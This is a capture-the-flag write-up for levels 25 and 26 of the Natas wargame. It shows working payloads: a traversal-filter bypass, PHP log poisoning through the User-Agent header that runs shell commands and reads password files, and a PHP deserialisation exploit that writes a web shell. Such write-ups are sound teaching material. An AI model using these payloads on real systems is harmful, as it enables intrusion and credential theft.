---
layout: post
title: natas-writeup - lv25-lv26
excerpt: "Writeup for the Natas wargame on overthewire.org, from Level 25 to 2?."
categories: [writeup]
tags: [itsec, wargame]
---

[overthewire / natas](http://www.overthewire.org/wargames/natas/)

## Level 25 ##

Looking at the source given to us, we control the `lang` parameter (e.g. `?lang=de` will switch the language to German). We should use this somehow get hold of the `natas_webpass` file - which means finding a way to make the `strstr` call evaluate to false.

{% highlight php %}
    function setLanguage(){
        /* language setup */
        if(array_key_exists("lang",$_REQUEST))
            if(safeinclude("language/" . $_REQUEST["lang"] ))
                return 1;
        safeinclude("language/en"); 
    }
    
    function safeinclude($filename){
        // check for directory traversal
        if(strstr($filename,"../")){
            logRequest("Directory traversal attempt! fixing request.");
            $filename=str_replace("../","",$filename);
        }
        // dont let ppl steal our passwords
        if(strstr($filename,"natas_webpass")){
            logRequest("Illegal file access detected! Aborting!");
            exit(-1);
        }
        // add more checks...

        if (file_exists($filename)) { 
            include($filename);
            return 1;
        }
        return 0;
    }
{% endhighlight %}

Bypassing the traversal is rather easy - if your string is `....//bar`, the `str_replace` expression will result in `../bar`. Just to prove this out, you can trigger an error with `?lang=....//.`. So what next? `logRequest` looks interesting:

{% highlight php %}
    function logRequest($message){
        $log="[". date("d.m.Y H::i:s",time()) ."]";
        $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
        $log=$log . " \"" . $message ."\"\n"; 
        $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
        fwrite($fd,$log);
        fclose($fd);
{% endhighlight %}

It looks like we could technically have access to our own logs. E.g. if your session cookie is `PHPSESSID=nulnhkq2j9fkq5379sv4pd5n34` you can access it via `?lang=....//logs/natas25_nulnhkq2j9fkq5379sv4pd5n34.log`:

```
[28.08.2020 08::57:18] PostmanRuntime/7.26.3 "Directory traversal attempt! fixing request."
```

That's cool, but it doesn't get us the password. And it doesn't seem we have any way to control `$message` either. *However*, there's this odd looking `$_SERVER['HTTP_USER_AGENT']`. The `User-Agent` header is something we fully control and doesn't seem to be sanitised in any way. This will get written as part of the log and, being loaded with `include`, essentially means it will execute it as a php file. Does it mean we have command injection? Setting `User-Agent` to `<?php echo implode(",",scandir("."));?>` and reading the log gives us:

```
[28.08.2020 09::00:17] .,..,.htaccess,.htpasswd,index-source.html,index.php,index.php.tmpl,language,logs "Directory traversal attempt! fixing request."
```

Yay! We can now search for that elusive `natas_webpass` file using `<?php echo exec("find / -name natas_webpass");?>` - which tells us it's under `/etc`. Now I got stuck for a while there because I didn't realise this was a directory, not a file `>_<`. A quick `ls` reveals the file we need, and `<?php echo file_get_contents("/etc/natas_webpass/natas26"); ?>` takes care of the rest.


## Level 26 ##

The code indicates that if the session cookie for the site contains a key called "drawing", it will end up calling `drawFromUserdata` which unserialises a user-controlled payload:

```php
if (array_key_exists("drawing", $_COOKIE)){
	$drawing=unserialize(base64_decode($_COOKIE["drawing"]));
```

Setting a line from `(0,0)` to `(400,300)` creates a `drawing` cookie encoded as `"YTozOntpOjA7YTo0OntzOjI6IngxIjtzOjE6IjEiO3M6MjoieTEiO3M6MToiMiI7czoyOiJ4MiI7czozOiIxMDAiO3M6MjoieTIiO3M6MzoiMjAwIjt9aToxO2E6MDp7fWk6MjthOjQ6e3M6MjoieDEiO3M6MToiMCI7czoyOiJ5MSI7czoxOiIwIjtzOjI6IngyIjtzOjM6IjQwMCI7czoyOiJ5MiI7czozOiIzMDAiO319"` which decodes to the below (spacing added manually):

```
a:3:{
i:0;
a:4:{
	s:2:\"x1\";s:1:\"1\";s:2:\"y1\";s:1:\"2\";s:2:\"x2\";s:3:\"100\";s:2:\"y2\";s:3:\"200\";
	}
i:1;
a:0:{}i:2;
a:4:{
	s:2:\"x1\";s:1:\"0\";s:2:\"y1\";s:1:\"0\";s:2:\"x2\";s:3:\"400\";s:2:\"y2\";s:3:\"300\";
	}
}
```

We can clearly see the 2 lines (one existing, one we added), complete with variable names. The data stored isn't a custom class but an array - the values of which are a string of length 2 (`s:2`) with value `x1`, followed by a string of length 1 (`s:1`) with value `1` etc...

In order to exploit the deserialisation, we need to use a class that is either present by default or defined in the scope. For this task we are given a `Logger` class that has the magic `__destruct` method:

```php
        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }  
```

This gives us control of two things - (1) the name of a file on the server and (2) its content. This may not sound like much but a bit like with the previous level, this *should* give us the ability to write arbitrary PHP files on the server.

To start, we re-create the `Logger` object locally and define what the variables should be:

```php
<?php
class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;

        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="<?php echo \"w00t\" ?>\n";
            $this->logFile = "img/" . $file . ".php";
        }
    }

$o = new Logger("qmmi2gi7i5621k5cehpjtgrh34");
echo base64_encode(serialize($o));
?>
```

Where `qmmi2gi7i5621k5cehpjtgrh34` is simply my `PHPSESSID` (not required, but let's not pollute/risk overwriting someone else's exploit). Accessing `http://natas26.natas.labs.overthewire.org/img/qmmi2gi7i5621k5cehpjtgrh34.php` shows this was successful!

All that's left to do is to change `exitMsg` to `<?php echo file_get_contents("/etc/natas_webpass/natas27"); ?>` - and done.
